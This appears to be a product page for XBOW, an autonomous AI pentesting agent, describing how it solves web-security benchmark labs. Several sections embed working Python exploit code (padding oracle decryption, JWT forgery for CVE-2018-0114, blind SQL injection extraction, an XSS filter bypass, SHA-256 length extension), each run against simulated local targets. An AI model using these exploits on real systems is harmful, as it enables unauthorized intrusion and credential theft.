XBOW uncovers a critical CVE in an open-source Q&A platform

Boosting offensive security with AI

XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks

195 / 261 PortSwigger Labs solved

204 / 282 PentesterLab Exercises solved

88 / 104 Novel Benchmarks solved

See XBOW at work

XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.

These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.

Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle

Don't roll your own crypto, or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.

  1. XBOW begins by verifying the presence of the CAPTCHA cookie and understanding its structure, guessing from the size (256-bit) that it may use AES

  2. XBOW begins its attempt to implement an attack to decrypt the cookie, refining its code and debugging issues it encounters

  3. One of its attempts reveals that the server responds with Invalid padding rather than Invalid CAPTCHA in some cases, a crucial feature of a padding oracle vulnerability

  4. After noticing that some cookie values trigger a 500 Internal Server Error, XBOW explores possible non-cryptographic attacks like SSTI

  5. XBOW decides to execute a full CBC padding oracle attack, and successfully decrypts the CAPTCHA cookie, but is unable to modify it to bypass authentication

  6. It realizes that the attack needs to target the CAPTCHA input (rather than modifying the cookie), and uses the decrypted cookie to create a new user and obtain the flag
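
The byte-at-a-time decryption described above can be sketched in a few lines of Python. This is an illustrative sketch only, not XBOW's code: a toy Feistel cipher stands in for AES so the example runs with the standard library alone, and every name here (`has_valid_padding`, `padding_oracle_decrypt`, the sample cookie plaintext) is an assumption made for the demonstration. The attack logic itself does not depend on which block cipher sits underneath CBC.

```python
import hashlib
import os

BLOCK = 16  # AES block size in bytes

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel network: a toy stand-in for AES, NOT secure.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    pad = BLOCK - len(plaintext) % BLOCK          # PKCS#7 padding
    data = plaintext + bytes([pad]) * pad
    prev = os.urandom(BLOCK)                      # random IV, sent first
    out = [prev]
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def has_valid_padding(key: bytes, ciphertext: bytes) -> bool:
    # Server side (hypothetical): leaks only whether the padding is valid.
    prev, plain = ciphertext[:BLOCK], b""
    for i in range(BLOCK, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        plain += xor(toy_decrypt_block(key, block), prev)
        prev = block
    pad = plain[-1]
    return 1 <= pad <= BLOCK and plain.endswith(bytes([pad]) * pad)

def decrypt_block(oracle, prev: bytes, block: bytes) -> bytes:
    inter = bytearray(BLOCK)  # cipher output before the CBC XOR, found right to left
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad            # force known bytes to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:
                # Rule out accidental longer paddings such as 02 02.
                forged[pos - 1] ^= 1
                still_valid = oracle(bytes(forged) + block)
                forged[pos - 1] ^= 1
                if not still_valid:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return xor(inter, prev)

def padding_oracle_decrypt(oracle, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(decrypt_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))
    return plain[:-plain[-1]]                     # strip the padding

key = os.urandom(16)                # known only to the simulated server
secret = b"captcha=H7K2QX"          # hypothetical cookie plaintext
cookie = cbc_encrypt(key, secret)
recovered = padding_oracle_decrypt(lambda ct: has_valid_padding(key, ct), cookie)
print(recovered)
```

The attacker code never touches `key`; it only asks the oracle yes/no questions, which mirrors the Invalid padding versus Invalid CAPTCHA distinction noted in step 3.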

Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API

Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site, finding one that holds the flag.
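
As a rough illustration of the introspection step, the sketch below builds a standard GraphQL introspection query and pulls the available query fields out of a response. The field name `getPrescriptions`, its `userId` argument, and the sample response are hypothetical placeholders, since the benchmark's real schema is not shown on this page.

```python
import json
from typing import Dict, List, Optional

# Standard introspection query: lists root query fields and their arguments.
INTROSPECTION_QUERY = """
{
  __schema {
    queryType {
      fields {
        name
        args { name }
      }
    }
  }
}
"""

def build_request_body(query: str, variables: Optional[dict] = None) -> str:
    """Serialize a GraphQL request as the JSON body of an HTTP POST."""
    return json.dumps({"query": query, "variables": variables or {}})

def list_query_fields(response: dict) -> Dict[str, List[str]]:
    """Map each root query field to the names of its arguments."""
    fields = response["data"]["__schema"]["queryType"]["fields"]
    return {f["name"]: [a["name"] for a in f["args"]] for f in fields}

# Hypothetical introspection response, for illustration only.
sample_response = {"data": {"__schema": {"queryType": {"fields": [
    {"name": "getPrescriptions", "args": [{"name": "userId"}]},
]}}}}

fields = list_query_fields(sample_response)

# IDOR probe: request another user's records by changing the ID argument.
probe = build_request_body(
    "query ($id: Int!) { getPrescriptions(userId: $id) { id } }",
    {"id": 1},
)
print(fields)
print(probe)
```

If the server returns data for an ID that does not belong to the logged-in user, the object reference is not being authorized, which is the defining trait of an IDOR.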

Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit

After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution, a Python program that exploits XML deserialization to deploy an embedded bash script, stealing secrets from running processes' command lines, is a thing of beauty.

  1. XBOW checks for public exploits using searchsploit, but ultimately opts to write its own code to exploit the issue

  2. When its initial attempts don't succeed, XBOW shows heroic perseverance in the face of very long Java stack traces, using the server's error messages to identify and fix issues

  3. After extensive debugging, XBOW determines the correct format expected by the server, and successfully submits a malicious job that will run /usr/local/bin/exfiltrate on the server to exfiltrate the flag, but does not receive the flag due to a missing environment variable in the benchmark setup

  4. Undeterred, XBOW uses its newfound ability to remotely execute code to debug the server environment itself

  5. By launching the exfiltration binary in the background and monitoring activity on the server, it spots the flag in the output of ps, allowing it to solve the benchmark

Researching and Implementing an Exploit for a node-jose Vulnerability

Faced with the task of exploiting CVE-2018-0114 in node-jose, XBOW combs through reams of GitHub issues and then uses what it learns to craft a custom proof-of-concept exploit to solve an exercise from PentesterLab rated "Hard".

  1. At first, XBOW tries to figure out how to exploit the vulnerability on its own

  2. It eventually concludes it's not making good progress, and embarks on a new goal: researching and crafting a precise exploit for CVE-2018-0114 in node-jose

  3. XBOW does research online by first checking NVD (unsuccessfully) and then using the GitHub API to search for repos related to CVE-2018-0114; this search is successful, but downloading the PoC fails

  4. It then decides to dump all GitHub issues mentioning node-jose jwt vulnerability (around 22,000 words, or 350KB of text) and reads them to understand the flaw

  5. XBOW synthesizes what it read and uses its new understanding to craft a Python script to exploit the vulnerability

  6. After one more round of tinkering, XBOW successfully exploits the issue, forging an admin JWT token using its own RSA keypair, and uses it to get the flag
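
CVE-2018-0114 comes down to a verifier trusting a public key embedded in the token's own `jwk` header. The sketch below models that idea with the standard library only. It is a simplified illustration, not node-jose's code and not XBOW's script: `vulnerable_verify` is a hypothetical stand-in for the flawed check, the `{"user": "admin"}` claim is an assumed payload, and the RSA key is built from two well-known Mersenne primes purely so the demo needs no key generation (such a key is trivially factorable and must never be used for real).

```python
import base64
import hashlib
import json

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def to_bytes(n: int) -> bytes:
    return n.to_bytes((n.bit_length() + 7) // 8, "big")

# Attacker's own RSA keypair (demo-only primes, NOT secure).
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent, needs Python 3.8+

# ASN.1 DigestInfo prefix for SHA-256, as used by RS256 (PKCS#1 v1.5).
SHA256_DIGEST_INFO = bytes.fromhex("3031300d060960864801650304020105000420")

def pkcs1_v15_encode(message: bytes, size: int) -> bytes:
    t = SHA256_DIGEST_INFO + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (size - len(t) - 3) + b"\x00" + t

def forge_token(claims: dict) -> str:
    # Embed the attacker's public key in the header, then sign with its private half.
    jwk = {"kty": "RSA", "n": b64u(to_bytes(N)), "e": b64u(to_bytes(E))}
    header = {"alg": "RS256", "typ": "JWT", "jwk": jwk}
    signing_input = (b64u(json.dumps(header).encode()) + "."
                     + b64u(json.dumps(claims).encode()))
    size = len(to_bytes(N))
    em = int.from_bytes(pkcs1_v15_encode(signing_input.encode(), size), "big")
    return signing_input + "." + b64u(pow(em, D, N).to_bytes(size, "big"))

def vulnerable_verify(token: str) -> dict:
    # Hypothetical model of the flaw: the verification key comes from the token.
    header_b64, payload_b64, sig_b64 = token.split(".")
    jwk = json.loads(b64u_decode(header_b64))["jwk"]
    n = int.from_bytes(b64u_decode(jwk["n"]), "big")
    e = int.from_bytes(b64u_decode(jwk["e"]), "big")
    size = len(to_bytes(n))
    em = pow(int.from_bytes(b64u_decode(sig_b64), "big"), e, n).to_bytes(size, "big")
    if em != pkcs1_v15_encode(f"{header_b64}.{payload_b64}".encode(), size):
        raise ValueError("bad signature")
    return json.loads(b64u_decode(payload_b64))

token = forge_token({"user": "admin"})   # hypothetical claim name
claims = vulnerable_verify(token)
print(claims)
```

The signature is mathematically valid, so the check passes; the mistake is that nothing ties the embedded key to a key the server actually trusts.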

Leveraging Weak Credentials to Exploit SSTI Vulnerabilities

After brute-forcing its way through the login system, XBOW explores the web app's internals and uncovers a Server-Side Template Injection (SSTI) vulnerability that allows executing arbitrary code remotely. As it proceeds, its payloads grow fearsomely complex, but its final solution to this novel XBOW benchmark is simple and elegant.

  1. After surveying the login page, XBOW employs brute-force guessing with common usernames and passwords, identifying weak credentials

  2. XBOW uses these weak credentials (user:user) to achieve authenticated access to the application and explore further

  3. After spotting a potential vulnerability in the /remind endpoint via its date parameter, it investigates whether it is susceptible to server-side vulnerabilities

  4. After some analysis, XBOW decides to investigate SSTI attacks in depth, progressively refining an attack script that tests common payloads

  5. Once the presence of an SSTI vulnerability is confirmed, XBOW attempts to read sensitive files or potentially write a web shell for more persistent access

  6. With remote code execution capability confirmed, XBOW produces a complete exploit that retrieves the content of the flag.txt file and solves the benchmark

Exploiting Blind SQL Injection from Scratch

XBOW can use existing tools, but it also understands the fundamentals. In this trace, it solves a "Practitioner"-level PortSwigger Blind SQL Injection lab without using sqlmap. Instead, it identifies a difference in how the server responds to different malformed SQL queries, and then exploits that difference to leak out the admin password one character at a time.

  1. XBOW starts by confirming the existence of a Blind SQL Injection vulnerability by looking for payloads that cause the application's behavior to change in response to the injected SQL

  2. After several unsuccessful initial tries, it steps back, considers its work so far, and proposes new approaches that could allow it to leak the database content

  3. XBOW confirms the vulnerability, and manually crafts initial commands to probe the length of the administrator password, making one guess at a time

  4. XBOW automates the process of determining the password length by writing a custom Python script that reveals the length

  5. Once it determines that the password is 20 characters, XBOW updates the script to guess each character of the password one by one, using the same Blind SQL Injection oracle

  6. The script successfully extracts the full administrator password, and XBOW uses it to log in and retrieve the flag
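
The length probe and character-by-character extraction can be sketched against a local stand-in. Everything below is an assumption made for illustration: an in-memory SQLite database replaces the lab's real backend, `page_shows_welcome` simulates a vulnerable endpoint whose response differs depending on whether the query matched, and the table names and password are invented. The lab in the trace distinguishes responses to malformed queries rather than page content, but the one-bit oracle idea is the same.

```python
import sqlite3
import string

# Simulated target (hypothetical schema and data).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("CREATE TABLE tracking (id TEXT)")
db.execute("INSERT INTO users VALUES ('administrator', 'k3q9x0m2v7b1n5c8z4j6')")
db.execute("INSERT INTO tracking VALUES ('abc')")

def page_shows_welcome(tracking_id: str) -> bool:
    # Deliberately vulnerable: user input is concatenated into the SQL text.
    query = f"SELECT 1 FROM tracking WHERE id = '{tracking_id}'"
    return db.execute(query).fetchone() is not None

def oracle(condition: str) -> bool:
    """Ask one yes/no question by injecting a boolean condition."""
    return page_shows_welcome(f"abc' AND ({condition}) AND '1'='1")

SUBQUERY = "SELECT {expr} FROM users WHERE username = 'administrator'"

def find_length(max_len: int = 64) -> int:
    for n in range(1, max_len + 1):
        if oracle(f"({SUBQUERY.format(expr='length(password)')}) = {n}"):
            return n
    raise RuntimeError("length not found")

def extract_password(length: int,
                     alphabet: str = string.ascii_lowercase + string.digits) -> str:
    recovered = ""
    for pos in range(1, length + 1):          # SQL substr() is 1-indexed
        expr = f"substr(password, {pos}, 1)"
        for ch in alphabet:
            if oracle(f"({SUBQUERY.format(expr=expr)}) = '{ch}'"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no match at position {pos}")
    return recovered

length = find_length()
password = extract_password(length)
print(length, password)
```

A binary search over character codes would cut the number of requests, but the linear guess loop matches the one-guess-at-a-time approach described in the steps above.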

Subverting Java Deserialization with Apache Commons

Despite facing a litany of technical challenges brought on by Java version incompatibilities, XBOW solves a "Practitioner"-level PortSwigger lab by subverting Java's mechanism for reconstructing an object from a sequence of bytes to execute arbitrary code when the unsuspecting application deserializes untrusted data.

Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)

In this novel XBOW benchmark, XBOW detects one of the OWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by using HTML entity encoding.
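
To show why HTML entity encoding can slip past a filter, here is a minimal sketch. The blocklist in `naive_filter`, the payload, and the `href` injection context are all hypothetical; the benchmark's actual filters are not described on this page. The point is only that a filter matching raw strings sees nothing suspicious, while a browser decodes character references in attribute values before using them.

```python
import html

def naive_filter(value: str) -> bool:
    """Hypothetical blocklist filter: returns True if the input is allowed."""
    blocked = ("<script", "javascript:", "alert(")
    return not any(token in value.lower() for token in blocked)

def entity_encode(text: str) -> str:
    """Encode every character as a decimal HTML character reference."""
    return "".join(f"&#{ord(ch)};" for ch in text)

payload = "javascript:alert(1)"
encoded = entity_encode(payload)

# Hypothetical injection context: an attribute value the attacker controls.
markup = f'<a href="{encoded}">click</a>'

print(naive_filter(payload))           # the raw payload is blocked
print(naive_filter(markup))            # the encoded form is allowed
print(html.unescape(encoded))          # what an HTML parser decodes it to
```

Decoding input before filtering, and escaping on output for the specific context, are the usual ways to close this gap.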

Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack

To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash length extension attack, all without access to the tutorial given to human solvers.

  1. XBOW first fetches the provided Ruby source code for the app, and learns from reading it that the app's /getfile endpoint can be used to read arbitrary files, but only if accompanied by a valid SHA-256 signature

  2. Recognizing that it needs to execute a hash length extension attack, XBOW attempts to install hash_extender, but finds that it is not available through apt

  3. It also tries to implement the attack using Python's standard hashlib library, but finds that its API does not offer sufficient control over the internal SHA-256 state variable it needs to manipulate

  4. After another unsuccessful attempt to obtain and use a third-party tool, XBOW decides to write its own SHA-256 implementation from scratch

  5. Its implementation of SHA-256 is correct, but its initial attempts to forge a signature and sign a payload that obtains the flag using directory traversal do not work

  6. After debugging the issue and hypothesizing that its earlier mistake was due to missing URL encoding, XBOW writes a Python script to retry the attack with a variety of key lengths, and succeeds on its next try
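
The reason a custom SHA-256 is needed is that the attack resumes hashing from a known digest, which requires setting the internal state directly. The sketch below is an independent illustration under stated assumptions, not XBOW's implementation: the signature scheme is assumed to be SHA-256(secret + message), and the secret, file name, and traversal suffix are hypothetical. Round constants are derived from primes rather than typed out, and the result is checked against `hashlib`.

```python
import hashlib
import math
import struct

MASK = 0xFFFFFFFF

def _primes(count):
    found, candidate = [], 2
    while len(found) < count:
        if all(candidate % p for p in found):
            found.append(candidate)
        candidate += 1
    return found

def _icbrt(n):
    # Integer cube root by binary search.
    lo, hi = 0, 1 << (n.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= n else (lo, mid - 1)
    return lo

# Constants: fractional bits of cube/square roots of the first primes.
K = [_icbrt(p << 96) & MASK for p in _primes(64)]
H0 = [math.isqrt(p << 64) & MASK for p in _primes(8)]

def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def compress(state, block):
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def md_padding(total_len):
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)

def sha256(data, state=None, prior_len=0):
    """Hash `data`, optionally resuming from `state` after `prior_len` bytes."""
    state = list(state or H0)
    data += md_padding(prior_len + len(data))
    for i in range(0, len(data), 64):
        state = compress(state, data[i:i + 64])
    return struct.pack(">8I", *state)

def extend(digest, known_msg, key_len, suffix):
    """Forge (message, signature) for secret + known_msg + glue + suffix."""
    glue = md_padding(key_len + len(known_msg))
    prior = key_len + len(known_msg) + len(glue)
    return known_msg + glue + suffix, sha256(suffix, struct.unpack(">8I", digest), prior)

secret = b"hypothetical-secret"            # unknown to the attacker
original = b"report.txt"                   # hypothetical signed file name
signature = hashlib.sha256(secret + original).digest()

def server_accepts(message, sig):
    return hashlib.sha256(secret + message).digest() == sig

forged = None
for key_len in range(1, 33):               # the key length must be guessed
    message, sig = extend(signature, original, key_len, b"/../../flag")
    if server_accepts(message, sig):
        forged = (key_len, message, sig)
        break
print(forged[0] if forged else "no key length worked")
```

Looping over candidate key lengths mirrors the final step above: the glue padding depends on the secret's length, so only the correct guess yields a signature the server accepts.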

Team

Security, AI, and Engineering

Oege de Moor, Founder and CEO
Nico Waisman, Head of Security
Albert Ziegler, Head of AI
Andrew Rice, Head of Engineering
Aqeel Siddiqui, Head of Operations
Alex Gatzlaff, Account Executive
Alvaro Muñoz, Security Researcher
Brendan Coll, Research Engineer
Brendan Dolan-Gavitt, AI Researcher
Daniel Wagner, Research Engineer
Diego Jurado, Security Researcher
Ewan Mellor, Research Engineer
Fernando Russ, Research Engineer
Ian Campbell, Research Engineer
Javier Gil, Security Researcher
Joanna Clifton, Operations
Joel Noguera, Security Researcher
Johan Rosenkilde, AI Researcher
Jordan McTaggart, Finance and Operations
Max Schaefer, AI Researcher
Meurig Thomas, Research Engineer
Nicolas Trippar, Security Researcher
Thomas Bolton, AI Researcher

You?

We are recruiting.

See open positions | Email us

Blog

Updates and opinions from the team

December 20, 2024  -  By Nico Waisman

The Nightmare Before Christmas: An arbitrary file download on Zoo-Project

XBOW discovered an arbitrary file download vulnerability on the WPS open source app Zoo-Project.

December 13, 2024  -  By Diego Jurado

Stored Cross-Site Scripting (XSS) in 2FAuth

XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.

December 2, 2024  -  By Diego Jurado

LabsAI’s EDDI project path traversal

XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.

Frequently asked questions

Benchmarks

What do you consider a “benchmark”?

A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than reflections of a realistic web security scenario.

Where did XBOW get its collection of benchmarks?

XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.

The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?

The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks to have the same crisp success criterion, which can be checked by our infrastructure. So we introduced a flag and a mechanism for returning it.

Could you provide more information about the novel XBOW benchmarks?

XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks are representative of many vulnerability classes and varying degrees of difficulty.

Will the novel XBOW benchmarks be released?

Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.

How many benchmarks does XBOW have?

XBOW has collected a corpus of thousands of benchmarks, both for evaluating performance and for improving it.

Where can I find more details about the benchmarks that XBOW solved?

We provide more details to back up the results reported on this website. See here for the benchmarks that were attempted, and which were solved.

Technology

How does the AI inside XBOW work?

It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only directions given to XBOW are the basic benchmark description.

Because we are a growing startup and this intellectual property is our main asset, we cannot share the details.

Are the example traces shown edited?

The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.

Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?

Yes, we have run experiments by blanking out the descriptions, and that works fine. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive: for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or just stop and report the core problem.

Is XBOW useful for everyone or does it require any sort of specific knowledge?

XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it, because a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team: combining such security expertise with AI and engineering skills.

Responsible AI

How will you ensure your technology won't be misused?

We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.


Join the waitlist

Be the first to know when we launch

By signing up to the waitlist, you agree to let us contact you with announcements about our technology, and you certify that you are over the age of 16.

